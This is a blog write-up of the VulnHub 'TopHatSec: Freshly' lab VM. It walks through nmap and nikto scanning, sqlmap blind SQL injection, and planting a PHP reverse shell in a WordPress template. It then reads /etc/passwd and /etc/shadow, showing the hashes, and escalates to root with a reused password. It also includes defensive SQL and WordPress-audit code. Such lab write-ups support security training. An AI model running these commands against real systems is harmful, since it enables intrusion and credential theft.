Tue. Oct 20th, 2020

Pentesting Fun Stuff

following the cyber security path…

TopHatSec: Freshly

Location

https://www.vulnhub.com/entry/tophatsec-freshly,118/

Description

The goal of this challenge is to break into the machine via the web and find the secret hidden in a sensitive file. If you can find the secret, send me an email for verification. 🙂
There are a couple of different ways that you can go with this one. Good luck!

Enumeration

Because I need an entry point, I’m going to start with an nmap scan to discover the open ports.

nmap -A -T4 -sV -p- 192.168.110.5

So port 80, 443, and 8080 are open. I’ll start with port 80.
“These are not the droids you’re looking for.” I always love that sentence! Let’s check whether it’s a hint at /robots.txt. Nothing.

nikto -h http://192.168.110.2/


SQL Injection

Two login pages. On /login.php there is nothing of interest in the source code, and the HTTP headers show nothing of interest either. I try injecting some single quotes to get an error, but nothing. I’m going to try login number 2, and in the meantime I’m giving sqlmap a try on login number 1.

sqlmap -u "http://192.168.110.2/login.php/" --data="user=&password=&s=Submit" --random-agent --not-string="0" --level=5 --risk=3

Login number 2 is a phpMyAdmin page. When I try to log in, I get a response.
[screenshot: phpMyAdmin error]
A MySQL server. Let’s try some single quotes here. I try different combinations, but I don’t get the response I want. In the meantime I check on the running sqlmap and see that the first login page is vulnerable to time-based blind SQLi.
[screenshots: sqlmap table dumps]
So I get the credentials of two users. Let’s log in with the first user. When I log in with the known credentials the page responds with a ‘1’; with bogus credentials it responds with a ‘0’. Because there is nothing else to retrieve from this page, I let sqlmap pull the credentials from the tables phpmyadmin and wordpress8080.
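To make that ‘1’ / ‘0’ oracle concrete, here is an added example (my own code, not the challenge’s login.php, whose source is never shown) of a login check that pastes the submitted fields into the SQL text, beside the same check written with bound parameters. It uses an in-memory SQLite table with a placeholder user as a stand-in for the MySQL backend; the splicing in the first version is exactly the kind of sink sqlmap’s boolean- and time-based techniques drive.

```python
import sqlite3

def make_db():
    # Constructed in-memory stand-in for the challenge's MySQL backend;
    # the user and password are placeholders, not values from the VM.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (user TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('alice', 'placeholder-pass')")
    return db

def login_vulnerable(db, user, password):
    # The submitted fields are pasted into the query text, so a quote
    # character in either field ends the string literal and whatever follows
    # is parsed as SQL: the WHERE clause itself, not just the values, is
    # under the client's control. Responds '1' / '0' like the page's login.php.
    query = ("SELECT COUNT(*) FROM users WHERE user = '%s' AND password = '%s'"
             % (user, password))
    (n,) = db.execute(query).fetchone()
    return "1" if n > 0 else "0"

def login_safe(db, user, password):
    # Bound parameters travel separately from the statement text; the driver
    # treats them as values only, so quotes in the input cannot change the
    # query's structure. Same observable '1' / '0' behaviour for real logins.
    query = "SELECT COUNT(*) FROM users WHERE user = ? AND password = ?"
    (n,) = db.execute(query, (user, password)).fetchone()
    return "1" if n > 0 else "0"

def compare(user, password):
    # Run both checks against the same input on a fresh database.
    db = make_db()
    return login_vulnerable(db, user, password), login_safe(db, user, password)
```

Only the parameterised version answers ‘0’ when the submitted fields contain SQL syntax instead of a real credential.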
When I visit the website on port 8080 there is a comment:

Again, no robots.txt, and apart from a directory named /img/ (with a collection of pictures inside) there was nothing to find with nikto. When I proceed I arrive at a WordPress site.
There is a comment on the page with a small reference to Star Wars again.

I don’t think I missed anything, since I probably already have the credentials for logging in to the WordPress account. Time to use the credentials.

WordPress

[screenshot: WordPress admin page]

Getting a reverse shell

To get a reverse shell, I edit the 404 page and replace its PHP code with the PHP reverse shell code from pentestmonkey.
[screenshots: reverse shell]
And I’m in. Time to search around the system.
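The reverse-shell step works because the WordPress dashboard lets an administrator rewrite theme templates. As an added defender-side example (my own code, not WordPress’s and not part of the original post), this script checks a WordPress tree for the two things that matter here: whether wp-config.php sets DISALLOW_FILE_EDIT, which removes the theme editor, and whether any theme template calls the socket and process functions a PHP reverse shell such as pentestmonkey’s relies on. The directory layout it scans is a constructed sample, not a real install.

```python
import os
import re
import tempfile

# Functions a PHP reverse shell uses to open a socket back out and spawn a
# shell; none of them belong in a theme template such as 404.php.
SHELL_MARKERS = re.compile(r"\b(fsockopen|proc_open|shell_exec|passthru|popen)\s*\(")
# Hardened setting: removes the dashboard theme/plugin editor entirely.
FILE_EDIT_OFF = re.compile(r"define\(\s*['\"]DISALLOW_FILE_EDIT['\"]\s*,\s*true\s*\)", re.I)

def audit_wordpress(root):
    """Return a list of findings for the WordPress install rooted at `root`."""
    findings = []
    cfg = os.path.join(root, "wp-config.php")
    if not os.path.exists(cfg):
        findings.append("wp-config.php: missing")
    else:
        with open(cfg, encoding="utf-8", errors="replace") as f:
            hardened = FILE_EDIT_OFF.search(f.read())
        if not hardened:
            findings.append("wp-config.php: DISALLOW_FILE_EDIT not true "
                            "(templates are editable from the dashboard)")
    themes = os.path.join(root, "wp-content", "themes")
    for dirpath, _, files in os.walk(themes):
        for name in sorted(files):
            if not name.endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as f:
                hit = SHELL_MARKERS.search(f.read())
            if hit:
                findings.append("%s: calls %s()" % (os.path.relpath(path, root), hit.group(1)))
    return findings

def build_sample_tree(edit_disabled, tampered_404):
    """Constructed stand-in for a WordPress tree (not a real install)."""
    root = tempfile.mkdtemp()
    theme = os.path.join(root, "wp-content", "themes", "sample")
    os.makedirs(theme)
    with open(os.path.join(root, "wp-config.php"), "w") as f:
        f.write("<?php\n" + ("define('DISALLOW_FILE_EDIT', true);\n" if edit_disabled else ""))
    with open(os.path.join(theme, "404.php"), "w") as f:
        # A tampered template is represented only by the socket-call marker.
        f.write("<?php fsockopen($host, $port); // constructed marker\n" if tampered_404
                else "<?php get_header(); ?><h1>Not found</h1><?php get_footer();\n")
    return root
```

Run `audit_wordpress` against a real docroot to get the same two classes of findings; an empty list means the editor is disabled and no template contains the marker functions.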

python -c 'import pty;pty.spawn("/bin/bash")'
daemon@Freshly:/$ cat /etc/*-release
cat /etc/*-release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=14.04
DISTRIB_CODENAME=trusty
DISTRIB_DESCRIPTION="Ubuntu 14.04.1 LTS"
NAME="Ubuntu"
VERSION="14.04.1 LTS, Trusty Tahr"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 14.04.1 LTS"
VERSION_ID="14.04"
HOME_URL="http://www.ubuntu.com/"
SUPPORT_URL="http://help.ubuntu.com/"
BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"
daemon@Freshly:/$ uname -a
uname -a
Linux Freshly 3.13.0-45-generic #74-Ubuntu SMP Tue Jan 13 19:37:48 UTC 2015 i686 i686 i686 GNU/Linux

Ubuntu 14.04 with kernel 3.13. I know that privilege escalation is possible there via overlayfs mounts inside user namespaces. To get the script to work I need to compile it, so I need gcc. Let’s see if it is available.

daemon@Freshly:/tmp$ compgen -c | grep -i "gcc"
compgen -c | grep -i "gcc"
daemon@Freshly:/tmp$

Nothing. Bummer.
Time to move along and search some more.

daemon@Freshly:/$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
messagebus:x:102:105::/var/run/dbus:/bin/false
user:x:1000:1000:user,,,:/home/user:/bin/bash
mysql:x:103:111:MySQL Server,,,:/nonexistent:/bin/false
candycane:x:1001:1001::/home/candycane:
# YOU STOLE MY SECRET FILE!
# SECRET = "NOBODY EVER GOES IN, AND NOBODY EVER COMES OUT!"

Ok. This was a bit unexpected. I guess this wraps the challenge up. The only thing is that I don’t have root access and haven’t pwned this machine. Stopping now would leave me with an unsatisfying feeling.

daemon@Freshly:/home$ cat /etc/shadow
cat /etc/shadow
root:$6$If.Y9A3d$L1/qOTmhdbImaWb40Wit6A/wP5tY5Ia0LB9HvZvl1xAGFKGP5hm9aqwvFtDIRKJaWkN8cuqF6wMvjl1gxtoR7/:16483:0:99999:7:::
daemon:*:16483:0:99999:7:::
bin:*:16483:0:99999:7:::
sys:*:16483:0:99999:7:::
sync:*:16483:0:99999:7:::
games:*:16483:0:99999:7:::
man:*:16483:0:99999:7:::
lp:*:16483:0:99999:7:::
mail:*:16483:0:99999:7:::
news:*:16483:0:99999:7:::
uucp:*:16483:0:99999:7:::
proxy:*:16483:0:99999:7:::
www-data:*:16483:0:99999:7:::
backup:*:16483:0:99999:7:::
list:*:16483:0:99999:7:::
irc:*:16483:0:99999:7:::
gnats:*:16483:0:99999:7:::
nobody:*:16483:0:99999:7:::
libuuid:!:16483:0:99999:7:::
syslog:*:16483:0:99999:7:::
messagebus:*:16483:0:99999:7:::
user:$6$MuqQZq4i$t/lNztnPTqUCvKeO/vvHd9nVe3yRoES5fEguxxHnOf3jR/zUl0SFs825OM4MuCWlV7H/k2QCKiZ3zso.31Kk31:16483:0:99999:7:::
mysql:!:16483:0:99999:7:::
candycane:$6$gfTgfe6A$pAMHjwh3aQV1lFXtuNDZVYyEqxLWd957MSFvPiPaP5ioh7tPOwK2TxsexorYiB0zTiQWaaBxwOCTRCIVykhRa/:16483:0:99999:7:::
# YOU STOLE MY PASSWORD FILE!
# SECRET = "NOBODY EVER GOES IN, AND NOBODY EVER COMES OUT!"

After a really long time, I tried the different passwords that were stored in the database against the root account, and guess what? Passwords are reused in this challenge 🙂

daemon@Freshly:/$ su root
su root
Password: SuperSecretPassword
root@Freshly:/# id
id
uid=0(root) gid=0(root) groups=0(root)

Now I can close this challenge with a satisfied feeling.
Good work on making this challenge.